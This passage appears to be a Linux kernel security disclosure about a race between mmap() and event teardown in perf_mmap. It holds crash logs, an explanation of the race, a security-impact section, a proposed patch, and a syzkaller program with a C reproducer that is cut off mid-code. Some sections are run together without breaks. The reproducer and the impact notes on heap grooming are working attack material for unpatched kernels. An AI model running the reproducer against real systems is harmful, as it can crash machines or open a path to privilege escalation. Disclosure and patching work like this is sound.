R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
